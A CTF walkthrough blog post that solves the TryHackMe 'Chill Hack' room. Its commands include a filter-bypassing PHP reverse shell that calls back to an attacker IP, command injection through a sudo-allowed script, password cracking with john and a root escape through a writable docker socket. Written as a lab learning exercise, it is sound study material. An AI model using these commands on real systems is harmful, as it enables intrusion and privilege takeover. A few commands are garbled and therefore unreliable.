Chill Hack(The Easy Way)
Today we will be solving Chill Hack Room of TryHackMe which is intermediate level CTF.So for this lets join the room and start the room .
Here we will start by scanning the room using nmap.
Command to be used:
sudo nmap -T4 -A ip_address
Here As we can see from the result anonymous login is allowed .so let's try to login as anonymous in FTP .
Command used:
ftp ip_address
Once we get in as anonymous let's search for any flag or clues.
On searching, we get the note.txt file in the server. Now, let's download the note.txt file from our local machine.
Command used to download the file: get note.txt
After downloading the note.txt file to our local machine let's look into its content.
From the above hint, we get to that there are at least two users: Anurodh and Apaar and
There is someplace to put commands and there is some filtering on strings.
Now let's search for the place where we can enter commands. There is a good chance that there are some hidden directories so let's gobuster to search for directories.
Command used :
gobuster dir -u http:ip_address -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Here we get one interesting directory called /secret.
Let's loot into the secret directory and check whether we can find anything useful or not.
BINGO!!! we get the command page. Now as mention above in note.txt there are some command filters.
Let's test which commands are filtered and which are unfiltered.
Here we get the hacker to alter which means ls command is filtered so now let's try to execute another command.
Here pwd command is not filtered.
Now, let's set the listener in the attacker machine using Netcat.
Command used:
nc -lnvp 4444
and enter reverses shell code into terminal by filtering it :‘p’hp -r ‘$sock=fsockopen(“10.9.120.205”,1234);exec(“/bin/bash -i <&3 >&3 2>&3”);’
Here now we will get the reverse shell into the device.
Now once we get the reverse shell let's check which user we have got the shell. For this type of command whoami to check the user.
Here we can see that we are www-data user.
Now let's start our search for privilege escalation for this at first let check:
sudo -l
Here we can see that the user www-data can run the /home/apaar/.helpline.sh as apaar.
So before running the helpline.sh let's check its content using cat.
Here by seeing the code we can see that it is vulnerable to command injection.So let's exploit it.
For this we have to run the helpline.sh as apaar using following command:
Enter the person whom you want to talk with: hero
Hello user! I am hero, Please enter your message:’ /bin/bash
python3-c ‘import pty;pty.spawn(“/bin/bash”)’
We successfully escalate our privilege to apaar. now let's go to apaar and check if there is any flag.
cd /home/apaar
Here we can see that there is a local.txt file .lets check its content.
BINGO!! we successfully got a user flag.
Now our next target is to get root access for this let's search the server for any hint.
At first lets check /var/www directory.
Upon checking the files directory inside /var/www we get a interesting file name hacker.php .
Let's check its content.
Here we get the image source: images/hacker-with-laptop_23–2147985341.jpg
Now let's download the file in our local system and check whether it contains some hidden file or not using steghide.
For this let's run an HTTP server on the target machine and then download the file from our local machine.
Now let's download the image file into our local machine using wget.
Once we download the file let's analyze the file using steghide.
command used:
steghide — extract -sf hacker-with-laptop_23–2147985341.jpg
Here we get the backup.zip file from the image. Let's try to unzip the file.
Here the zip file is password protected. So let's use zip2john and john to crack the password.
Command to be used:
zip2john backup.zip > input_john.txt
john -w=/usr/share/wordliss/rockyou.txt input_john.txt
To see the hashed password.
john — show input_john.txt
Here we get the password for the zip file which is pass1word.
Now let's unzip the file with the given password.
Here source_code.php file is extracted. now let's check the content of the file.
Here we get the bas64 encoded in if condition and from analyzing the code we can guess that it's the encoded password of Anurodh. Now let's try to decode the base64 using an online decoder.
Upon decoding, we get to know the password which is: !d0ntKn0wmYp@ssw0rd
Now lest try to ssh connect as anurodh.
we successfully gain access to anurodh. Now let's download linpeas.sh into our target system through our local machine using wget and run it to find information for privilege escalation.
Once we download the linpeas.sh to our target system lets run it for searching privilege escalation points.
Command to be used :
chmod +x linpeas.sh
./linpeas.sh
Here we can see that /var/run/docker.sock is writable with a link. Now, lets visit the link and search for docker on the webpage.
Here now let's the docker command mentioned in the webpage.
Command :
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
Once we run the command we get unable to find ubuntu: latest locally.
So let's replace the ubuntu with a local docker image.
New command :
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash
After running the docker command we successfully gain root privelege.
Now let's go to the root directory and check for the flag.
Command :
cd /root
cat proof.txt
BINGO!!! we get the root flag.
Hence By the above-mentioned ways, we can gain both the flags.
(NOTE: You can skip privilege escalation of apaar and directly perform root privilege escalation to gain both flags but it is good practice to follow complete steps.)
References:
https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)